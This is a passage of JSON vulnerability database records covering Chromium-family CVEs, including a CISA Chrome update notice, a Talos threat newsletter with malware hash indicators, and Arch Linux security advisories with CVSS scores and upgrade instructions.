"MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21160"], "modified": "2021-05-19T00:00:00", "id": "TALOS-2021-1235", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1235", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:57", "description": "Google has released Chrome version 78.0.3904.87 for Windows, Mac, and Linux. 
This version addresses vulnerabilities that an attacker could exploit to take control of an affected system. One of these vulnerabilities (CVE-2019-13720) was detected in exploits in the wild.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the [Chrome Release](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-31T00:00:00", "type": "cisa", "title": "Google Releases Security Updates for Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-10-31T00:00:00", "id": 
"CISA:809811C28F231C547A37018C8189C268", "href": "https://us-cert.cisa.gov/ncas/current-activity/2019/10/31/google-releases-security-updates-chrome", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2019-11-14T15:37:55", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nThe only news we\u2019re going to cover this week is the biggest news we\u2019ve had in a while. Tuesday, we announced that Cisco Incident Response was becoming part of the Talos family. We\u2019ve been working together for years, but now we\u2019ll be closer than ever, so Incident Response can benefit from Talos\u2019 intelligence, while their boots-on-the-ground experience will only add to Talos\u2019 portfolio. \n \nCheck out our [announcement blog post](<https://blog.talosintelligence.com/2019/11/talos-cisco-incident-response-team-up.html>) for more information. The Talos Incident Response [at-a-glance](<https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/084/678/original/IR-AAG-3.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20191107%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20191107T153609Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=dafed95cccffbd6448473bcbb91f3516731d2ad25499ebcaf24147d014cceb32>) also provides an overview of the services IR provides. And the new [IR page](<https://talosintelligence.com/incident_response>) on TalosIntelligence.com gives you an easy way to contact IR, should you need their services. 
\n \nWe also have a [special edition of the Beers with Talos podcast](<https://blog.talosintelligence.com/2019/11/beers-with-talos-ep-65-please-welcome.html>), where Amy Henderson of Talos\u2019 Threat Interdiction team joins us to talk about the benefits of this new relationship. \n \n\n\n### Upcoming public engagements with Talos\n\n**Event: **\u201cIt\u2019s Never DNS\u2026. It Was DNS: How Adversaries Are Abusing Network Blind Spots\u201d at [SecureWV/Hack3rCon X](<https://securewv.org/>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date: **Nov. 15 - 17 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don\u2019t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more. \n \n**Event: **\u201cReading Telegram messages abusing the shadows\u201d at [BSides Lisbon](<https://bsideslisbon.org/schedule/>) \n**Location: **Auditorio FMD-UL, Lisbon, Portugal \n**Date: **Nov. 28 - 29 \n**Speakers: **Vitor Ventura \n**Synopsis: **One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. 
This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications. \n \n**Event: **\u201cSigned, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks\u201d at [CactusCon](<https://www.cactuscon.com/2019-talks-and-workshops/signed-sealed-compromised-the-past-present-and-future-of-supply-chain-attacks>) \n**Location: **Charleston Coliseum & Convention Center, Charleston, WV \n**Date:** Dec. 6 - 7 \n**Speakers: **Edmund Brumaghin and Earl Carter \n**Synopsis: **This talk will discuss the common techniques we\u2019re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future. \n\n\n### Cyber Security Week in Review\n\n * The [first public exploitation of the BlueKeep vulnerability](<https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/>) hit over the weekend. Security researchers noticed the attacks in honeypots installing cryptocurrency miners, far from the worst possible outcome from these kinds of attacks. \n * The U.S. and Taiwan [held cyber war exercises](<https://www.bbc.com/news/technology-50289974>) this week being touted as the first of their kind. Taiwanese officials say the two countries focused on attacks that could come from North Korean-linked adversaries and other nation-state actors. \n * The head of Russia\u2019s State Security Service recently said at a conference Russia and the U.S. have [resumed cooperation on cyber security](<https://www.thedailybeast.com/putins-top-spy-russian-fsb-chief-alexander-bortnikov-were-teaming-up-with-dc-on-cybersecurity>). Russia is maintaining contact between their security experts and the CIA, FBI and DEA in the U.S., he said. 
\n * Google is teaming up with [three private cyber security firms](<https://www.zdnet.com/article/google-asks-three-mobile-security-firms-to-help-scan-play-store-apps/>) to scan the Google Play store for malicious apps. Malware authors have been able to create ways to bypass the traditional protections Google put in place to stop malicious apps before they are posted on the store. \n * Two former Twitter employees were [charged with spying on behalf of Saudi Arabia](<https://www.cnn.com/2019/11/06/tech/twitter-employees-saudi-arabia-spying/index.html>). American prosecutors say the two men used their privileged access to gather information on Saudi political dissidents. \n * Voting machines in one Indiana county reportedly [switched users\u2019 votes](<https://thehill.com/homenews/state-watch/469137-machines-reportedly-switching-votes-plagues-indiana-county-for-second>), one of a few reports of malfunctioning machines on election day in the U.S. Several voters reported that the touchscreen machines would not select the candidate they wanted to choose, errors that are backed up with video evidence. \n * Apple [released updates](<https://www.forbes.com/sites/zakdoffman/2019/10/31/apple-patches-serious-ios-13-and-catalina-security-issues-update-your-devices-now/#34d873a52c2a>) for its Catalina operating system and iOS to patch several critical remote code execution vulnerabilities. The U.S. Department of Homeland Security urged users to update their devices as soon as possible. \n * Malware authors are starting to [unleash a wave of politically themed malware](<https://blog.talosintelligence.com/2019/11/political-malware.html>). Talos recently discovered malware families using the likenesses of U.S. President Donald Trump and Russian leader Vladimir Putin in a series of ransomware, RATs and screenlockers. 
\n\n### Notable recent security issues\n\n**Title: **[Use-after-free bug in Chrome could allow complete system takeover](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) \n**Description: **Google Chrome is urging users to update their web browsers as soon as possible due to a critical use-after-free vulnerability. The company says it will be releasing updates this week to protect against exploitation of the bug. The vulnerability, identified as CVE-2019-13720, exists in Chrome\u2019s audio component, and could allow an attacker to execute arbitrary code or enable full remote code execution capabilities. \n**Snort SIDs: **52068, 52069 \n \n**Title: **[Two remote code execution vulnerabilities in Investintech Able2Extract](<https://blog.talosintelligence.com/2019/11/vuln-spotlight-RCE-investintech-able2extract-nov-2019.html>) \n**Description: **Cisco Talos recently discovered two remote code execution vulnerabilities in Investintech\u2019s Able2Extract Professional. This software is a cross-platform PDF tool for Windows, Mac and Linux that converts PDFs and allows users to create and edit them. Other features include PDF signing, redactions and annotations. An attacker could exploit these vulnerabilities to execute arbitrary code on the victim machine. 
\n**Snort SIDs: **50864 - 50869 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/gui/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename:** xme64-2141.exe \n**Claimed Product: **N/A \n**Detection Name:** W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854](<https://www.virustotal.com/gui/file/6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854/details>) \n**MD5:** 74f4e22e5be90d152521125eaf4da635 \n**Typical Filename:** jsonMerge.exe \n**Claimed Product:** ITSPlatform \n**Detection Name: **W32.GenericKD:Attribute.22lk.1201 \n \n**SHA 256: **[46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08](<https://www.virustotal.com/gui/file/46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08/details>) \n**MD5:** db69eaaea4d49703f161c81e6fdd036f \n**Typical Filename: **xme32-2141-gcc.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.46B241E3D3-95.SBX.TG \n \n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5:** 8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** Eternalblue-2.2.0.exe \n**Claimed Product:** N/A \n**Detection Name:** W32.WNCryLdrA:Trojan.22k2.1201\n\n", "cvss3": {}, "published": "2019-11-14T07:12:30", "type": "talosblog", "title": "Threat Source 
newsletter (Nov. 7, 2019)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-14T07:12:30", "id": "TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/4n3ghJUQWvA/threat-source-newsletter-oct-31-2019.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-201911-7\n=========================================\n\nSeverity: Critical\nDate : 2019-11-04\nCVE-ID : CVE-2019-13720\nPackage : electron\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1061\n\nSummary\n=======\n\nThe package electron before version 7.0.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 7.0.1-1.\n\n# pacman -Syu \"electron>=7.0.1-1\"\n\nThe problem has been fixed upstream in version 7.0.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. 
Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://github.com/electron/electron/commit/25b3ee29cf9a8e3f59dcbabf7345b5b1360cd056\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-04T00:00:00", "type": "archlinux", "title": "[ASA-201911-7] electron: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-04T00:00:00", "id": "ASA-201911-7", "href": "https://security.archlinux.org/ASA-201911-7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-201911-2\n=========================================\n\nSeverity: Critical\nDate : 2019-11-02\nCVE-ID : CVE-2019-13720\nPackage : qt5-webengine\nType : arbitrary code execution\nRemote 
: Yes\nLink : https://security.archlinux.org/AVG-1059\n\nSummary\n=======\n\nThe package qt5-webengine before version 5.13.2-2 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 5.13.2-2.\n\n# pacman -Syu \"qt5-webengine>=5.13.2-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/64347\nhttps://code.qt.io/cgit/qt/qtwebengine-chromium.git/patch/?id=d6e5fc10e417efdf8665d9fba57c269f0534072f\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://security.archlinux.org/CVE-2019-13720", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-02T00:00:00", "type": "archlinux", "title": "[ASA-201911-2] qt5-webengine: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2019-11-02T00:00:00", "id": "ASA-201911-2", "href": "https://security.archlinux.org/ASA-201911-2", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:59", "description": "Arch Linux Security Advisory ASA-201911-1\n=========================================\n\nSeverity: Critical\nDate : 2019-11-01\nCVE-ID : CVE-2019-13720 CVE-2019-13721\nPackage : chromium\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1058\n\nSummary\n=======\n\nThe package chromium before version 78.0.3904.87-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 78.0.3904.87-1.\n\n# pacman -Syu \"chromium>=78.0.3904.87-1\"\n\nThe problems have been fixed upstream in version 78.0.3904.87.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-13720 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the audio component of\nthe chromium browser before 78.0.3904.87. 
Google is aware of reports\nthat an exploit for this vulnerability exists in the wild.\n\n- CVE-2019-13721 (arbitrary code execution)\n\nA use-after-free vulnerability has been found in the PDFium component\nof the chromium browser before 78.0.3904.87.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\nhttps://crbug.com/1019226\nhttps://crbug.com/1013868\nhttps://security.archlinux.org/CVE-2019-13720\nhttps://security.archlinux.org/CVE-2019-13721", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-01T00:00:00", "type": "archlinux", "title": "[ASA-201911-1] chromium: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "modified": "2019-11-01T00:00:00", "id": "ASA-201911-1", "href": "https://security.archlinux.org/ASA-201911-1", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T16:33:56", "description": "Arch Linux Security Advisory 
ASA-202103-19\n==========================================\n\nSeverity: High\nDate : 2021-03-25\nCVE-ID : CVE-2020-27844 CVE-2021-21159 CVE-2021-21160 CVE-2021-21161\nCVE-2021-21162 CVE-2021-21163 CVE-2021-21165 CVE-2021-21166\nCVE-2021-21167 CVE-2021-21168 CVE-2021-21169 CVE-2021-21170\nCVE-2021-21171 CVE-2021-21172 CVE-2021-21173 CVE-2021-21174\nCVE-2021-21175 CVE-2021-21176 CVE-2021-21177 CVE-2021-21178\nCVE-2021-21179 CVE-2021-21180 CVE-2021-21181 CVE-2021-21182\nCVE-2021-21183 CVE-2021-21184 CVE-2021-21185 CVE-2021-21186\nCVE-2021-21187 CVE-2021-21188 CVE-2021-21189 CVE-2021-21190\nCVE-2021-21191 CVE-2021-21192 CVE-2021-21193\nPackage : vivaldi\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1633\n\nSummary\n=======\n\nThe package vivaldi before version 3.7.2218.45-1 is vulnerable to\nmultiple issues including arbitrary code execution, insufficient\nvalidation, access restriction bypass, content spoofing, incorrect\ncalculation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 3.7.2218.45-1.\n\n# pacman -Syu \"vivaldi>=3.7.2218.45-1\"\n\nThe problems have been fixed upstream in version 3.7.2218.45.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-27844 (arbitrary code execution)\n\nA heap-based buffer overflow was discovered in lib/openjp2/t2.c:973 in\nthe current master (commit 18b1138fbe3bb0ae4aa2bf1369f9430a8ec6fa00) of\nOpenJPEG.\n\n- CVE-2021-21159 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21160 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the WebAudio\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21161 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the TabStrip\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21162 
(arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21163 (insufficient validation)\n\nAn insufficient data validation security issue was found in the Reader\nMode component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21165 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21166 (arbitrary code execution)\n\nAn object lifecycle security issue was found in the audio component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21167 (arbitrary code execution)\n\nA use after free security issue was found in the bookmarks component of\nthe Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21168 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nappcache component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21169 (information disclosure)\n\nAn out of bounds memory access security issue was found in the V8\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21170 (content spoofing)\n\nAn incorrect security UI security issue was found in the Loader\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21171 (content spoofing)\n\nAn incorrect security UI security issue was found in the TabStrip and\nNavigation components of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21172 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the File\nSystem API component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21173 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nNetwork Internals component of the Chromium browser before version\n89.0.4389.72.\n\n- 
CVE-2021-21174 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nReferrer component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21175 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the Site\nisolation component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21176 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the full\nscreen mode component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21177 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nAutofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21178 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nCompositing component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21179 (arbitrary code execution)\n\nA use after free security issue was found in the Network Internals\ncomponent of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21180 (arbitrary code execution)\n\nA use after free security issue was found in the tab search component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21181 (information disclosure)\n\nA side-channel information leakage security issue was found in the\nautofill component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21182 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nnavigations component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21183 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21184 (incorrect calculation)\n\nAn inappropriate implementation security issue was found in the\nperformance 
APIs component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21185 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\nextensions component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21186 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the QR\nscanning component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21187 (insufficient validation)\n\nAn insufficient data validation security issue was found in the URL\nformatting component of the Chromium browser before version\n89.0.4389.72.\n\n- CVE-2021-21188 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.72.\n\n- CVE-2021-21189 (access restriction bypass)\n\nAn insufficient policy enforcement security issue was found in the\npayments component of the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21190 (arbitrary code execution)\n\nAn uninitialized use security issue was found in the PDFium component\nof the Chromium browser before version 89.0.4389.72.\n\n- CVE-2021-21191 (arbitrary code execution)\n\nA use after free security issue was found in the WebRTC component of\nthe Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21192 (arbitrary code execution)\n\nA heap buffer overflow security issue was found in the tab groups\ncomponent of the Chromium browser before version 89.0.4389.90.\n\n- CVE-2021-21193 (arbitrary code execution)\n\nA use after free security issue was found in the Blink component of the\nChromium browser before version 89.0.4389.90. 
Google is aware of\nreports that an exploit for this issue exists in the wild.\n\nImpact\n======\n\nA remote attacker might be able to bypass security measures, trick the\nuser into performing unwanted actions or execute arbitrary code.\n\nReferences\n==========\n\nhttps://vivaldi.com/blog/desktop/minor-update-2-for-vivaldi-desktop-3-6/\nhttps://vivaldi.com/blog/vivaldi-fires-up-performance-2/\nhttps://github.com/uclouvain/openjpeg/issues/1299\nhttps://github.com/uclouvain/openjpeg/pull/1301\nhttps://github.com/uclouvain/openjpeg/commit/73fdf28342e4594019af26eb6a347a34eceb6296\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\nhttps://crbug.com/1171049\nhttps://crbug.com/1170531\nhttps://crbug.com/1173702\nhttps://crbug.com/1172054\nhttps://crbug.com/1111239\nhttps://crbug.com/1174582\nhttps://crbug.com/1177465\nhttps://crbug.com/1161144\nhttps://crbug.com/1152226\nhttps://crbug.com/1166138\nhttps://crbug.com/1111646\nhttps://crbug.com/1152894\nhttps://crbug.com/1150810\nhttps://crbug.com/1154250\nhttps://crbug.com/1158010\nhttps://crbug.com/1146651\nhttps://crbug.com/1170584\nhttps://crbug.com/1173879\nhttps://crbug.com/1174186\nhttps://crbug.com/1174943\nhttps://crbug.com/1175507\nhttps://crbug.com/1182767\nhttps://crbug.com/1049265\nhttps://crbug.com/1105875\nhttps://crbug.com/1131929\nhttps://crbug.com/1100748\nhttps://crbug.com/1153445\nhttps://crbug.com/1155516\nhttps://crbug.com/1161739\nhttps://crbug.com/1165392\nhttps://crbug.com/1166091\nhttps://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html\nhttps://crbug.com/1167357\nhttps://crbug.com/1181387\nhttps://crbug.com/1186287\nhttps://security.archlinux.org/CVE-2020-27844\nhttps://security.archlinux.org/CVE-2021-21159\nhttps://security.archlinux.org/CVE-2021-21160\nhttps://security.archlinux.org/CVE-2021-21161\nhttps://security.archlinux.org/CVE-2021-21162\nhttps://security.archlinux.org/CVE-2021-21163\nhttps://security.archlinux.org/CVE-2021-
21165\nhttps://security.archlinux.org/CVE-2021-21166\nhttps://security.archlinux.org/CVE-2021-21167\nhttps://security.archlinux.org/CVE-2021-21168\nhttps://security.archlinux.org/CVE-2021-21169\nhttps://security.archlinux.org/CVE-2021-21170\nhttps://security.archlinux.org/CVE-2021-21171\nhttps://security.archlinux.org/CVE-2021-21172\nhttps://security.archlinux.org/CVE-2021-21173\nhttps://security.archlinux.org/CVE-2021-21174\nhttps://security.archlinux.org/CVE-2021-21175\nhttps://security.archlinux.org/CVE-2021-21176\nhttps://security.archlinux.org/CVE-2021-21177\nhttps://security.archlinux.org/CVE-2021-21178\nhttps://security.archlinux.org/CVE-2021-21179\nhttps://security.archlinux.org/CVE-2021-21180\nhttps://security.archlinux.org/CVE-2021-21181\nhttps://security.archlinux.org/CVE-2021-21182\nhttps://security.archlinux.org/CVE-2021-21183\nhttps://security.archlinux.org/CVE-2021-21184\nhttps://security.archlinux.org/CVE-2021-21185\nhttps://security.archlinux.org/CVE-2021-21186\nhttps://security.archlinux.org/CVE-2021-21187\nhttps://security.archlinux.org/